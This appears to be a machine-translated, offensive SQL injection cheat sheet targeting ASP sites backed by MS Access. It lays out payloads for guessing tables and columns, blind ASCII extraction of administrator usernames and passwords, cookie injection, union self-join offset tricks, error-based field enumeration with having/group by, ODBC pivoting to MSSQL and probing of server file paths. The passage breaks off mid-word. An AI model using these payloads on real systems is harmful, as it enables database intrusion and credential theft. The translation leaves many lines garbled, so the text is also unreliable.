I. Basics
To guess the table name, use the statement of "ah d" here:
And exists (select * from table name)
Name of the name to be guessed:
And exists (select field from table name)
The UNION method. We recommend that you perform order by before executing union. This will be faster.
Joint query:
Select name, password, id from user union select user, pwd, uid from
If the order by error message is displayed, the union operation can be performed twice.
And 1 = 2 union select 1, 2, 3, 4, 5 from table name union select 1, 2, 3, 4, 5 from Table Name
Specify the table name:
And 1 = 2 union select 1, 2, 3, 4, 5 from Table Name
ASCII verbatim decoding:
1. Length of the column to be guessed
Explain statement:
And (select top 1 len (column name) from Table Name)> N
And (select top 1 len (column name) from Table Name) = N
Where N is a number, the length of the column is guessed by changing the value of N, for example:
And (select top 1 len (column name) from Table Name)> 1
And (select top 1 len (column name) from Table Name)> 6
If you have always guessed that 6 is displayed on the normal page, and an error (greater than 6 and less than or equal to 7) is returned when you guess 7, the length of this column is 7
. Because "top 1" means to extract the first record, it should be used if you want to guess the second record:
Select top 1 len (column name) from Table Name
Where column name not in (select top 1 column name from table name)
2. ASCII code analysis method to guess the user and password
ASC () and Mid Functions
Example: mid (column name, N, 1)
ASC (mdi (column name, N, 1) obtains the nth ASCII code of the "column name ".
The explain statement is:
And (select top 1 asc (mid (field, 1, 1) from database name) = ASC code (changed by Conversion Tool)
Interval judgment statement:
"... Between... and ......"
Chinese processing method:
Use the abs () function to obtain the absolute value after ASCII conversion is "negative.
Example: and (select top 1 abs (asc (mid (field, 1, 1) from database name) = ASC code (changed by Conversion Tool)
ASCII verbatim decoding:
1. Name of the table to be guessed:
And (select count (*) from admin) <> 0
2. Name of the guess column:
And (select count (column name) from Table Name) <> 0
3. Guess the number of administrator users:
And (select count (*) from Table Name) = 1
The returned result is normal. There is a record in the table.
4. Guess the length of the administrator user name:
And (select len (column name) from Table Name)> = 1,> = 2,> = 3,> = 4.
5. Guess the administrator user name:
And (select count (*) from table name where (asc (mid (column name, 1, 1) between 30 and 130) <> 0
Last submitted:
And (select asc (mid (column name, 1, 1) from Table Name) = ascii Value
6. Guess the Administrator's password:
According to the above principle, you only need to replace the column name of (asc (mid (column name,) in the preceding statement with PASSWORD to obtain the administrator PASSWORD.
Code.
Search injection vulnerability uses the following statement:
Keyword % and 1 = 1 and % = %
Keyword % and 1 = 2 and % = %
Replace and 1 = 1 with an injection statement.
Cookie injection statement:
Javascript: alert (document. cookie = "id =" + escape ("44 and 1 = 1 "));
Javascript: alert (document. cookie = "id =" + escape ("44 and 1 = 2 "));
Explain statement:
Guess length:
Javascript: alert (document. cookie = "id =" + escape ("44 and (select len (password) from admin)
= 16 "))
Guess the content:
Javascript: alert (document. cookie = "id =" + escape ("44 and (select asc (mid (username) from
Admin) = 97 "))
Ii. Advanced
1. Acc offset Injection
Condition. You know the name and field of a table. Generally, the ID field still exists.
If you know that the number of columns produced by order by is 20, you need to know the number of fields in the admin table,
And 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, * from admin error, continue,
And 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, * from admin increases one by one until the return is normal.
For example, if and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, * from admin
If the returned result is normal, the admin table fields may pop up, depending on the complexity of the admin table and the RP
If the returned result is normal at 15, the number of admin fields is 20-15 = 5, and the following is the link. An important condition for auto-join is:
Admin field count * 2 <Number of columns output by order by, you can see that the auto-join conditions are very strict
Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, * from (admin as a inner join admin as B on a. id = B. id)
Use id as the condition to double the number of fields in the admin table. This (admin as a inner join admin as B on a. id = B. id) is
Admin table self-join, so the table after from will become the table with the double number of fields, the first 10 + 2*5 = 20 fields are valid
. * The field represents a wider chance of increasing the display position of username password.
What should I do if I am not there? So
Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, a. id, * from (admin as a inner join admin as B on
A. id = B. id)
Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, a. id, B. id, * from (admin as a inner join admin as B on
A. id = B. id)
Do you think this statement is valid? 10 + 2 + 5*2 = 22> 20
This is critical. Why is it a legal statement that must be understood at the technical core. The front side is 22, and the back side is 20.
How can they be equal? Because a. id and B. id exist in *, the computer automatically removes the unique
First, although the query results are the same, the order of the fields in * is disrupted! Two successive disconnections are likely to cause
Username password offset to the displayed position.
What if it is not successful?
Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, a. id, B. id, c. id, * from (admin as a inner join admin
B on a. id = B. id) inner join admin as c on a. id = c. id)
Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, a. id, B. id, c. id, d. id, * from (admin as a inner join
Admin as B on a. id = B. id) inner join admin as c on a. id = c. id) inner join admin as d on
A. id = d. id)
2. having and group by statements
The having and group by statements are also supported in the Access database. As we all know, these two statements are commonly used to enumerate fields.
In the Mssql database. It is awkward in acc. We will discuss the situation here,
A: If the SQL query statement of the site is select id, name, address from table name, that is to say, the query is a specific number of fields.
So we can be so violent, productshow. asp? Id = 25 group by 1 having 1 = 1 (number type), if the character
Type: group by 1 having 1 = 1
Returned error:
Microsoft JET Database Engine (0x80040E21)
The query to be executed does not contain the specific expression id that is part of the aggregate function.
The id field is displayed. Continue, productshow. asp? Id = 25 group by 1, id having 1 = 1
Returned error:
Microsoft JET Database Engine (0x80040E21)
The query to be executed does not contain a specific expression email as part of the aggregate function.
And productshow. asp? Id = 25 group by 1, id, email having 1 = 1
B: If the original SQL query statement of the site is select * from product where id = "& ID &", the preceding statement is returned.
The following error is returned:
Microsoft JET Database Engine error 80040e21
Fields that have been selected * cannot be combined.
/Productshow. asp, Row 18
In this case, the field productshow. asp? Id = 25 having sum (1) = 1 (number type), linear type (having
Sum (1) = 1)
Returned error:
Microsoft JET Database Engine error 80040e21
The query to be executed does not contain the specific expression id that is part of the aggregate function.
/Productshow. asp, Row 18
It can be seen that the ID is exposed.
But this is very limited, only the first id can be revealed, the other is no way. You can only make a blind guess.
Productshow. asp? Id = 25 and id = 1 no error, productshow. asp? Id = 25 and name = 1 error:
Microsoft JET Database Engine error 80040e10
At least one parameter is not specified.
/Productshow. asp, Row 18
3. Connect to the MsSQL database
Productshow. asp? Id = 25 and 1 = 2 union Select top 1 1, 2, table_name from [ODBC; Driver = SQL
Server; UID = dbo; PWD = dba; Server = *****; DataBase = master]. information_schema.tables
In this way, the first table name of the master database will come out.
It's easy to get the name of the following table.
Union Select top 1 1, 2, table_name from [ODBC; Driver = SQL
Server; UID = dbo; PWD = dba; Server = *****; DataBase = master]. information_schema.tables where
Table_name not in (select top 1 table_name from
[ODBC; Driver = SQLServer; UID = dbo; PWD = dba; Server = *****; DataBase = master]. information_schema.ta
Bles)
If the ID in the database is balanced
Union Select top 1 1, 2, table_name from
[ODBC; Driver = SQLServer; UID = dbo; PWD = dba; Server = ***; DataBase = master]. information_schema.tab
Les where 1 = 1
Returned error:
Microsoft JET Database Engine error 80004005
ODBC -- connection to SQL Server ****** failed.
If the returned error is delayed for a long time, the database cannot be connected. If the returned error is fast and there is no delay
The provided account or password is incorrect.
4. Map the local drive
Use the in statement, such as productshow. asp? Id = 25 and 1 = 2 union select * from admin in.
Returned error:
Microsoft JET Database Engine error 80004005
Microsoft Jet Database Engine cannot open file c: windowssystem32inetsrv. It has been unique by other users
Open the account or do not have the permission to view data.
This query can be used to detect directories and files. It is useful for searching website directories.
For example: productshow. asp? Id = 25 and 1 = 2 union select * from admin in C: windowsODBC. ini
Returned error:
Microsoft JET Datab